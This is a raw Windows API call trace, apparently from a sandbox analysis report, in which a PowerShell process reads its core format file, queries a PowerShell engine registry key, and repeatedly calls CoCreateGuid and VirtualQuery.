	[0299.475] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0299.475] GetFileType (hFile=0x300) returned 0x1
	[0299.475] SetErrorMode (uMode=0x1) returned 0x1
	[0299.475] GetFileType (hFile=0x300) returned 0x1
	[0299.475] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0299.476] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0299.476] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0299.476] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0299.476] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0299.476] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0299.477] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0299.477] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0299.477] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0299.477] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0299.477] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0299.477] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0299.477] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0299.478] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0299.478] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0299.478] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0299.478] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0299.478] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0299.479] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0299.479] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0299.479] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x1000, lpOverlapped=0x0) returned 1
	[0299.479] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0xe67, lpOverlapped=0x0) returned 1
	[0299.479] ReadFile (in: hFile=0x300, lpBuffer=0x33449ef, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x33449ef*, lpNumberOfBytesRead=0x1cd398*=0x0, lpOverlapped=0x0) returned 1
	[0299.479] ReadFile (in: hFile=0x300, lpBuffer=0x3345420, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd398, lpOverlapped=0x0 | out: lpBuffer=0x3345420*, lpNumberOfBytesRead=0x1cd398*=0x0, lpOverlapped=0x0) returned 1
	[0299.479] SetErrorMode (uMode=0x1) returned 0x1
	[0299.479] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd340 | out: lpFileInformation=0x1cd340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0299.480] SetErrorMode (uMode=0x1) returned 0x1
	[0299.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0299.480] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd428 | out: phkResult=0x1cd428*=0x300) returned 0x0
	[0299.480] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd3ac, lpData=0x0, lpcbData=0x1cd3a8*=0x0 | out: lpType=0x1cd3ac*=0x1, lpData=0x0, lpcbData=0x1cd3a8*=0x56) returned 0x0
	[0299.480] CoTaskMemAlloc (cb=0x5a) returned 0x1b830740
	[0299.480] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd37c, lpData=0x1b830740, lpcbData=0x1cd378*=0x56 | out: lpType=0x1cd37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd378*=0x56) returned 0x0
	[0299.480] CoTaskMemFree (pv=0x1b830740) 
	[0299.480] RegCloseKey (hKey=0x300) returned 0x0
	[0299.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0299.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0300.007] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xa63eadfd, Data2=0x63f7, Data3=0x441a, Data4=([0]=0x95, [1]=0x81, [2]=0xb2, [3]=0xa8, [4]=0xf, [5]=0xdf, [6]=0x16, [7]=0x5b))) returned 0x0
	[0300.008] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x5f89bd27, Data2=0xf609, Data3=0x493f, Data4=([0]=0x82, [1]=0x56, [2]=0x5b, [3]=0x74, [4]=0x4b, [5]=0x27, [6]=0xbf, [7]=0x7b))) returned 0x0
	[0300.008] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xb39ded54, Data2=0x3dac, Data3=0x487b, Data4=([0]=0xa9, [1]=0xa3, [2]=0x39, [3]=0x51, [4]=0xca, [5]=0x8c, [6]=0xbd, [7]=0x5e))) returned 0x0
	[0300.008] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x3f26968f, Data2=0xec06, Data3=0x4903, Data4=([0]=0x90, [1]=0x8e, [2]=0xe2, [3]=0xaa, [4]=0x93, [5]=0x1b, [6]=0xf8, [7]=0x9))) returned 0x0
	[0300.008] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xb43f296f, Data2=0xf6c3, Data3=0x4240, Data4=([0]=0xaf, [1]=0xc4, [2]=0xe1, [3]=0x45, [4]=0x4a, [5]=0xc, [6]=0xda, [7]=0xa1))) returned 0x0
	[0300.008] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xa4cedb50, Data2=0xc508, Data3=0x454d, Data4=([0]=0xaf, [1]=0x60, [2]=0x14, [3]=0x89, [4]=0xfe, [5]=0x1b, [6]=0x4c, [7]=0xbd))) returned 0x0
	[0300.008] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xe75dafc1, Data2=0x62e4, Data3=0x4981, Data4=([0]=0xb9, [1]=0x70, [2]=0x10, [3]=0xb5, [4]=0x5b, [5]=0xfa, [6]=0xfa, [7]=0xd9))) returned 0x0
	[0300.008] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.008] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xa5673246, Data2=0x6804, Data3=0x4ca1, Data4=([0]=0xb9, [1]=0x45, [2]=0x39, [3]=0xef, [4]=0x14, [5]=0x3, [6]=0x21, [7]=0x5))) returned 0x0
	[0300.008] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x75e68aa9, Data2=0x17a9, Data3=0x4ade, Data4=([0]=0xad, [1]=0x76, [2]=0xc8, [3]=0xf3, [4]=0x3f, [5]=0x59, [6]=0x81, [7]=0x54))) returned 0x0
	[0300.008] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x501703b1, Data2=0x340c, Data3=0x4baa, Data4=([0]=0x8f, [1]=0xb6, [2]=0x1d, [3]=0xca, [4]=0xd2, [5]=0xa4, [6]=0x73, [7]=0xfa))) returned 0x0
	[0300.008] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x3609445c, Data2=0xa11c, Data3=0x4b96, Data4=([0]=0xab, [1]=0x67, [2]=0x2c, [3]=0xa2, [4]=0x89, [5]=0xd3, [6]=0xc6, [7]=0x0))) returned 0x0
	[0300.009] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xef962ee0, Data2=0xb99, Data3=0x4fa0, Data4=([0]=0xaf, [1]=0xee, [2]=0xfe, [3]=0x4c, [4]=0xda, [5]=0xdb, [6]=0x5b, [7]=0x3d))) returned 0x0
	[0300.009] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x877528f1, Data2=0xc343, Data3=0x42b5, Data4=([0]=0xb3, [1]=0xd8, [2]=0xf7, [3]=0x3b, [4]=0xf8, [5]=0x56, [6]=0x87, [7]=0xe3))) returned 0x0
	[0300.009] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x969788e5, Data2=0x3e61, Data3=0x4627, Data4=([0]=0xa5, [1]=0x68, [2]=0x34, [3]=0x20, [4]=0x97, [5]=0x96, [6]=0x9d, [7]=0x9f))) returned 0x0
	[0300.009] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x2d934582, Data2=0xc495, Data3=0x4fd1, Data4=([0]=0x9e, [1]=0x0, [2]=0xd9, [3]=0xff, [4]=0xca, [5]=0x1e, [6]=0xf1, [7]=0x8))) returned 0x0
	[0300.009] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xda1f4286, Data2=0x1975, Data3=0x43f7, Data4=([0]=0xb5, [1]=0xf5, [2]=0xc, [3]=0xfe, [4]=0x7d, [5]=0x12, [6]=0xa4, [7]=0xa8))) returned 0x0
	[0300.009] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x8769c2e7, Data2=0x73d2, Data3=0x4a4a, Data4=([0]=0x92, [1]=0x62, [2]=0x27, [3]=0xd4, [4]=0x33, [5]=0x2d, [6]=0x14, [7]=0xeb))) returned 0x0
	[0300.009] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xf6e98d0c, Data2=0x5bc7, Data3=0x4d18, Data4=([0]=0x97, [1]=0xb7, [2]=0x6e, [3]=0x7e, [4]=0x44, [5]=0x64, [6]=0xdc, [7]=0x8d))) returned 0x0
	[0300.009] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x212276c9, Data2=0xbb79, Data3=0x4c7c, Data4=([0]=0xbd, [1]=0x99, [2]=0xce, [3]=0xf5, [4]=0xf5, [5]=0xdf, [6]=0x61, [7]=0x41))) returned 0x0
	[0300.009] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.009] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.009] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.010] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x170241a2, Data2=0xa795, Data3=0x4f69, Data4=([0]=0xb1, [1]=0x33, [2]=0xa4, [3]=0x63, [4]=0x9f, [5]=0xae, [6]=0x8, [7]=0xe7))) returned 0x0
	[0300.010] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x6c810d26, Data2=0x6369, Data3=0x45de, Data4=([0]=0x87, [1]=0xa9, [2]=0x10, [3]=0xcd, [4]=0x77, [5]=0x73, [6]=0x22, [7]=0x9f))) returned 0x0
	[0300.010] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xaf96b063, Data2=0x7efb, Data3=0x4bce, Data4=([0]=0xb5, [1]=0x1, [2]=0x61, [3]=0x55, [4]=0x42, [5]=0x10, [6]=0x23, [7]=0xd7))) returned 0x0
	[0300.010] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x8e59a241, Data2=0x4c4e, Data3=0x4795, Data4=([0]=0xa5, [1]=0xaa, [2]=0x73, [3]=0x21, [4]=0x7, [5]=0xca, [6]=0xdf, [7]=0x9f))) returned 0x0
	[0300.010] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x64b5ddf6, Data2=0x6179, Data3=0x4cde, Data4=([0]=0xb6, [1]=0x2b, [2]=0xa6, [3]=0xfe, [4]=0x3c, [5]=0x46, [6]=0xd4, [7]=0x10))) returned 0x0
	[0300.010] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x9978e06e, Data2=0xbaa6, Data3=0x461f, Data4=([0]=0xa7, [1]=0x17, [2]=0xb9, [3]=0x1a, [4]=0x60, [5]=0x14, [6]=0x85, [7]=0x7a))) returned 0x0
	[0300.010] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x8d3fa9a4, Data2=0x8fe5, Data3=0x4040, Data4=([0]=0x80, [1]=0x69, [2]=0x72, [3]=0x3c, [4]=0x39, [5]=0xf6, [6]=0xda, [7]=0xbf))) returned 0x0
	[0300.010] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xe18f95da, Data2=0x2a78, Data3=0x43d9, Data4=([0]=0x91, [1]=0xb6, [2]=0x30, [3]=0xc7, [4]=0x3d, [5]=0x81, [6]=0xc5, [7]=0x20))) returned 0x0
	[0300.010] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x1115271, Data2=0x2ca0, Data3=0x41f9, Data4=([0]=0xa4, [1]=0xd, [2]=0xa4, [3]=0x28, [4]=0xe2, [5]=0xfa, [6]=0xb6, [7]=0x8c))) returned 0x0
	[0300.010] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x701283b0, Data2=0xaa28, Data3=0x4ff2, Data4=([0]=0x84, [1]=0x4, [2]=0x79, [3]=0xa6, [4]=0xad, [5]=0x70, [6]=0xd9, [7]=0xe0))) returned 0x0
	[0300.010] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x69a6b34, Data2=0xddb2, Data3=0x4ae7, Data4=([0]=0x90, [1]=0xbf, [2]=0x7e, [3]=0x9a, [4]=0x5, [5]=0x14, [6]=0x31, [7]=0x7d))) returned 0x0
	[0300.010] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x128eb836, Data2=0xc7c5, Data3=0x4d45, Data4=([0]=0xa5, [1]=0x7d, [2]=0x30, [3]=0x37, [4]=0xb, [5]=0x90, [6]=0xd4, [7]=0x40))) returned 0x0
	[0300.011] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xc0dad2b0, Data2=0xdefe, Data3=0x4168, Data4=([0]=0x8a, [1]=0x87, [2]=0x80, [3]=0xb4, [4]=0x10, [5]=0x88, [6]=0xae, [7]=0x67))) returned 0x0
	[0300.011] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.011] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xea2d7efe, Data2=0xa00a, Data3=0x4920, Data4=([0]=0x88, [1]=0x99, [2]=0x98, [3]=0xd1, [4]=0x46, [5]=0x52, [6]=0x36, [7]=0x7))) returned 0x0
	[0300.011] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.011] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.012] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x3a06777e, Data2=0xe0f7, Data3=0x4a79, Data4=([0]=0xa8, [1]=0x1d, [2]=0x61, [3]=0xcc, [4]=0xc8, [5]=0x4e, [6]=0xa5, [7]=0x5a))) returned 0x0
	[0300.012] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.012] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x563938c1, Data2=0x4229, Data3=0x4fab, Data4=([0]=0xb4, [1]=0x71, [2]=0x13, [3]=0x7e, [4]=0x6a, [5]=0xf0, [6]=0x1d, [7]=0x93))) returned 0x0
	[0300.012] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x2d6d7925, Data2=0xae3f, Data3=0x4074, Data4=([0]=0xa9, [1]=0xb3, [2]=0xdc, [3]=0x60, [4]=0x78, [5]=0xbc, [6]=0x48, [7]=0x4))) returned 0x0
	[0300.012] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x9d1ca0cf, Data2=0x7c76, Data3=0x4d15, Data4=([0]=0xa7, [1]=0xa0, [2]=0xd8, [3]=0x13, [4]=0xd2, [5]=0xe, [6]=0xf1, [7]=0x13))) returned 0x0
	[0300.012] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x7aae1715, Data2=0xa696, Data3=0x4682, Data4=([0]=0x92, [1]=0xc7, [2]=0x49, [3]=0x31, [4]=0x2a, [5]=0xdf, [6]=0x77, [7]=0x27))) returned 0x0
	[0300.012] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xd8081af2, Data2=0xec4e, Data3=0x48e5, Data4=([0]=0xad, [1]=0x92, [2]=0xaa, [3]=0x7b, [4]=0xa7, [5]=0x52, [6]=0x29, [7]=0x8e))) returned 0x0
	[0300.012] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x3d887f31, Data2=0x9b40, Data3=0x4c0c, Data4=([0]=0xa2, [1]=0x78, [2]=0xf4, [3]=0xc4, [4]=0x9c, [5]=0x54, [6]=0x4a, [7]=0x6c))) returned 0x0
	[0300.012] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xa310b15, Data2=0x5ca, Data3=0x4fd7, Data4=([0]=0x90, [1]=0x44, [2]=0x3d, [3]=0x8a, [4]=0x72, [5]=0x88, [6]=0xfe, [7]=0x68))) returned 0x0
	[0300.013] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.013] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xe85229ce, Data2=0xf910, Data3=0x41f5, Data4=([0]=0x86, [1]=0x21, [2]=0xe5, [3]=0xe7, [4]=0x50, [5]=0x5b, [6]=0x1d, [7]=0x12))) returned 0x0
	[0300.013] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x9d8ece14, Data2=0x10ea, Data3=0x429a, Data4=([0]=0xb0, [1]=0xf4, [2]=0x9, [3]=0x75, [4]=0x11, [5]=0x89, [6]=0x15, [7]=0x61))) returned 0x0
	[0300.013] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xed7c0b63, Data2=0x7935, Data3=0x47b3, Data4=([0]=0xb2, [1]=0x9e, [2]=0x96, [3]=0xbe, [4]=0xb4, [5]=0x36, [6]=0xfb, [7]=0xe5))) returned 0x0
	[0300.013] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xa0f24649, Data2=0xbf75, Data3=0x48c5, Data4=([0]=0x8b, [1]=0x9f, [2]=0xf1, [3]=0xfa, [4]=0x22, [5]=0x65, [6]=0x5a, [7]=0xb8))) returned 0x0
	[0300.013] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xb59d704d, Data2=0x186a, Data3=0x4f47, Data4=([0]=0xa5, [1]=0x54, [2]=0xee, [3]=0x25, [4]=0x6d, [5]=0x1, [6]=0x92, [7]=0x48))) returned 0x0
	[0300.013] VirtualQuery (in: lpAddress=0x1cc000, lpBuffer=0x1ccec0, dwLength=0x30 | out: lpBuffer=0x1ccec0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.013] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0xe8bb4e15, Data2=0x34f3, Data3=0x472b, Data4=([0]=0x8b, [1]=0xb3, [2]=0x34, [3]=0xaa, [4]=0xfc, [5]=0xd, [6]=0x27, [7]=0x7d))) returned 0x0
	[0300.013] CoCreateGuid (in: pguid=0x1cd650 | out: pguid=0x1cd650*(Data1=0x386c17ea, Data2=0x6656, Data3=0x4ec3, Data4=([0]=0xac, [1]=0xa7, [2]=0x65, [3]=0x6c, [4]=0xc9, [5]=0xf5, [6]=0x53, [7]=0x5f))) returned 0x0
	[0300.013] VirtualQuery (in: lpAddress=0x1cc070, lpBuffer=0x1ccf30, dwLength=0x30 | out: lpBuffer=0x1ccf30*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0300.014] VirtualQuery (in: lpAddress=0x1cc070, lpBuffer=0x1ccf30, dwLength=0x30 | out: lpBuffer=0x1ccf30*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
